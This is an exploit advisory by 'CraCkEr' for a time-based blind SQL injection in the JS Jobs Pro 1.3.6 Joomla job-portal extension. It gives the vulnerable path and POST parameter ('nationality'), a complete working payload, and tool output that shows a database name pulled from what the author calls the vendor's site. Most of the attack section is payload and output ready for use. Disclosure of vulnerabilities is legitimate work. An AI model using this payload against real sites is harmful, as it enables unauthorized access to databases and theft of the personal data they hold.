Joomla JS Jobs Pro 1.3.6 SQL Injection

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                      [ Exploits ]                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : extensions.joomla.org                                                      │
│  Vendor   : Joom Sky - joomsky.com                                                     │
│  Software : JS Jobs Pro 1.3.6 JobPortal for Joomla                                     │
│  Vuln Type: SQL Injection                                                              │
│  Method   : POST                                                                       │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Typically used for remotely exploitable vulnerabilities that can lead to              │
│  system compromise                                                                     │
│                                                                                        │
│                                                                                        │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

  CryptoJob (Twitter) twitter.com/CryptozJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2022                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /js-jobs/jm/pro/index.php/employer-control-panel/resume-search-results


POST parameter 'nationality' is vulnerable

---
Parameter: nationality (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: title=&name=&nationality=(CASE WHEN (5462=5462) THEN SLEEP(5) ELSE 5462 END)&gender=&jobcategory=&jobsubcategory=&jobtype=&currency=&jobsalaryrange=&heighestfinisheducation=&experiencemin=&experiencemax=&keywords=&submit_app=Resume Search&isresumesearch=1&view=resume&layout=resume_searchresults&uid=0&option=com_jsjobs&task11=view
---


[+] Starting the Attack


[INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[INFO] fetching current database

current database: 'demjomsk_jmjsjobs'


[-] Done